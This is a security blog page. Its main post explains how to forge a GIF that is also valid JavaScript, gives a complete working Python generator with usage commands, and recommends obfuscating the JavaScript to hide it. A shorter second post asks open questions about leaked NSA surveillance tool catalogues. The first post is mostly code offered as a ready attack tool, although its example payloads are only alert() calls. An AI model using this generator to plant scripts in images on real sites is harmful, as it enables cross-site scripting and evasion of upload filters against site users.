Monday, January 6, 2014

Hacking through image: GIF turn

In one of my previous posts I described a way to hack through images: I showed how a valid BMP file could be a valid JS file as well, hiding JavaScript operations inside the image. Today it's time to describe how this attack works with a more common web file format: .GIF. Ange commented on my previous post pointing me to his great work on the topic; I recommend having a look at his study (here). Below is my quick 'n dirty Python implementation of the technique.

The following HTML page loads a GIF file and a JavaScript file which happen to be the same file: 1.gif_malw.gif. In theory the file should be either a valid GIF file or a valid JavaScript file. Can it be valid JavaScript and a valid image file at the same time? The answer should be NO. But with a properly forged file the answer is YES, it can. Let's assume we have the following HTML page.


Loading this page in a browser gives the following result:


As you can see, both tags (img and script) are successfully processed. The img tag shows the black GIF file and the script tag does its job by executing the JavaScript (alert('test')). Note that the script tag only runs the file because the browser does not enforce the script's Content-Type here: a response served as image/gif together with X-Content-Type-Options: nosniff is refused by the script tag in current browsers. How is this possible? The following image shows one detail of the dirty code that generates the beautiful GIF file.


This is not magic at all. This is just my implementation of the permissive GIF parsing many libraries share: the two-byte logical screen width field accepts any value, and decoders ignore whatever follows the trailer byte (0x3B). The idea behind this Python code is to place the bytes \x2F\x2A (aka "/*", the start of a JavaScript block comment) inside the valid GIF header, as the logical screen width, and then close the comment after the end of the image with \x2A\x2F (aka "*/"). Before injecting the payload you inject a simple expression like "=1;" or the commonly used "=a;", so that the JavaScript parser consumes the whole GIF block as an assignment to a variable named after the signature (GIF89a=1;). "=1;" is the safer choice: "=a;" throws a ReferenceError unless a is declared somewhere in the script (var hoisting is what makes the obfuscated example further down work). The following image shows the first part of a forged GIF header that exploits this weakness (click to enlarge).


After injecting the "padding" characters (here I call padding the '=a;' characters, which serve the JS interpreter) it's time to inject the real payload. The small script I wrote automates this process, and you can run it in a really easy way:
 
Run it as: gif.py -i image.gif "alert(\"test\");"
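To make the layout concrete, here is a stand-alone reimplementation of the forging steps above. It is an added example, not the gif.py linked from this post: it works on a constructed 43-byte 1x1 GIF embedded inline, overwrites the logical screen width with "/*", appends "*/=1;" plus the payload after the trailer, and then checks both views of the result: what a GIF decoder reads (header fields and where it stops) and what the JavaScript parser effectively sees once the block comment is removed. The function names and the refusal to use a GIF whose data already contains "*/" are my own choices.

```python
import re
import struct

# Constructed sample input (not a file from the original post): the classic
# 43-byte GIF89a with a single 1x1 black, transparent pixel.
TINY_GIF = (
    b"GIF89a"                                    # signature + version
    b"\x01\x00\x01\x00"                          # logical screen width/height = 1x1
    b"\x80\x00\x00"                              # packed (global color table, 2 entries), bg, aspect
    b"\x00\x00\x00\xff\xff\xff"                  # global color table: black, white
    b"\x21\xf9\x04\x01\x00\x00\x00\x00"          # graphic control extension
    b"\x2c\x00\x00\x00\x00\x01\x00\x01\x00\x00"  # image descriptor, 1x1 at (0,0)
    b"\x02\x02\x44\x01\x00"                      # LZW min code size 2, one sub-block, terminator
    b"\x3b"                                      # trailer: decoders stop here
)

JS_COMMENT_OPEN = b"/*"   # \x2F\x2A, stored as the logical screen width
JS_COMMENT_CLOSE = b"*/"  # \x2A\x2F, appended after the trailer


def gif_trailer_offset(data: bytes) -> int:
    """Walk the GIF block structure and return the offset of the 0x3B trailer.

    This mirrors what a decoder does; everything after the trailer is ignored,
    which is why the appended JavaScript does not break the image.
    """
    if data[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13
    if packed & 0x80:                              # global color table present
        pos += 3 * (2 ** ((packed & 0x07) + 1))

    def skip_subblocks(p: int) -> int:
        while data[p] != 0:                        # each sub-block: length byte + data
            p += 1 + data[p]
        return p + 1                               # skip the 0x00 block terminator

    while True:
        block = data[pos]
        if block == 0x3B:
            return pos
        if block == 0x21:                          # extension: label byte, then sub-blocks
            pos = skip_subblocks(pos + 2)
        elif block == 0x2C:                        # image descriptor (10 bytes)
            img_packed = data[pos + 9]
            pos += 10
            if img_packed & 0x80:                  # local color table
                pos += 3 * (2 ** ((img_packed & 0x07) + 1))
            pos = skip_subblocks(pos + 1)          # +1 for the LZW minimum code size
        else:
            raise ValueError("unexpected block 0x%02x at offset %d" % (block, pos))


def make_polyglot(gif: bytes, payload: str, pad: str = "=1;") -> bytes:
    """Build a file that is a GIF for <img> and a script for <script>.

    Bytes 6-7 (logical screen width) become "/*", so the JS parser reads the
    identifier GIF89a followed by a block comment that swallows the image data;
    "*/" + pad + payload goes after the trailer, where decoders stop reading.
    """
    if gif[:6] not in (b"GIF87a", b"GIF89a"):
        raise ValueError("not a GIF")
    body = gif[8:]
    if JS_COMMENT_CLOSE in body:
        # A stray "*/" inside the image data would close the comment early and
        # the script would not parse; re-encode or pick another image instead.
        raise ValueError("image data contains '*/'; re-encode or choose another GIF")
    return gif[:6] + JS_COMMENT_OPEN + body + JS_COMMENT_CLOSE + (pad + payload).encode()


def js_view(polyglot: bytes) -> str:
    """What the JavaScript parser effectively sees: the block comment removed."""
    text = polyglot.decode("latin-1")
    return re.sub(r"/\*.*?\*/", "", text, count=1, flags=re.S)


def logical_screen(polyglot: bytes) -> tuple:
    """Width/height exactly as a GIF decoder reads them from the header."""
    return struct.unpack("<HH", polyglot[6:10])


if __name__ == "__main__":
    out = make_polyglot(TINY_GIF, 'alert("test");')
    print(logical_screen(out))      # (10799, 1): "/*" read as a little-endian width
    print(js_view(out))             # GIF89a=1;alert("test");
    print(gif_trailer_offset(out), len(out))
    with open("polyglot.gif", "wb") as f:
        f.write(out)
```

The width field ends up as 0x2A2F (10799 pixels), which decoders accept without complaint; the payload sits past the trailer, so the decoder never sees it, while the JavaScript parser only ever sees `GIF89a=1;` followed by the payload.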


Don't forget that you may want to use an obfuscator to better hide your JavaScript, as in the following example:

python gif.py -i 2.gif "var _0x9c4c=[\"\x48\x65\x6C\x6C\x6F\x20\x57\x6F\x72\x6C\x64\x21\",\"\x0A\",\"\x4F\x4B\"];var a=_0x9c4c[0];function MsgBox(_0xccb4x3){alert(_0xccb4x3+_0x9c4c[1]+a);} ;MsgBox(_0x9c4c[2]);"

If you want to check and/or download the code click here.
Enjoy your new hackish tool!


Saturday, January 4, 2014

NSA Technology

In 4 weeks I received from five to seven emails (I don't remember the exact number) asking my opinion about the NSA leaks. It's "hard" to talk about the spying situation happening around us, so I won't express my personal opinion on it, but I am going to share some simple questions that come to my mind while thinking about it.

According to many sources (just a couple of them, here and here) the NSA developed an arsenal of super secret electronic weapons able to spy on computers, networks, routers, firewalls and so on. But if you are an avid reader you'll probably notice that all those weapons are almost 10 years old. Let's, for instance, focus on the PICASSO GSM HANDSET. The following image is taken directly from the leaked PICASSO GSM HANDSET documents.
The mobile phones used to describe the project are 2 generations old. They were made at the beginning of the 2000s. Why would the NSA use old mobile phones to describe a super advanced technology? Maybe because the described technology was developed almost 10 years ago..?

Again, let's focus on the NIGHTSTAND Wireless Exploitation project. The following image is taken directly from the leaked NIGHTSTAND Wireless Exploitation document. The PC you see in the black box belongs to a "previous netbook PC era". The monitor size is reminiscent of pretty old technology (modern PCs no longer have square 1:1 monitors). Nowadays they would probably use a tablet or, even better, a smartphone.

Again, let's focus on what is written in the following leaked document:
VALIDATOR is a small Trojan implant used as a back door against a variety of targeted Windows boxes from Windows 98 through Windows Server 2003.
The following image shows the leaked VALIDATOR description:
The question rising in my mind is pretty straightforward:

"If 10 years ago the NSA owned such a technology, what could it own right now?"

Now, let's assume the NSA is one of the most powerful organizations in SIGINT and/or one of the biggest organizations in the world owning advanced technology. The NSA is a secret agency. A secret agency is great at its job if it "remains secret". We know that almost every nation/state on earth owns a secret agency. We also know that this kind of technology is a reality (we do have proof, right?).

"How can we assert that the NSA is the best security agency in the world?"
"Do these leaks come from the NSA because it is not the best secret agency in the world?"
If so, are there any other big secret agencies in the world even more powerful than the NSA? If so, what about the technology owned by the biggest and best secret agency in the world?

These questions do not express any personal opinion; they are just doubts and questions still open in my mind. If any of you has some kind of answer and/or wants to share their own thoughts, you are very welcome (please add comments rather than sending emails).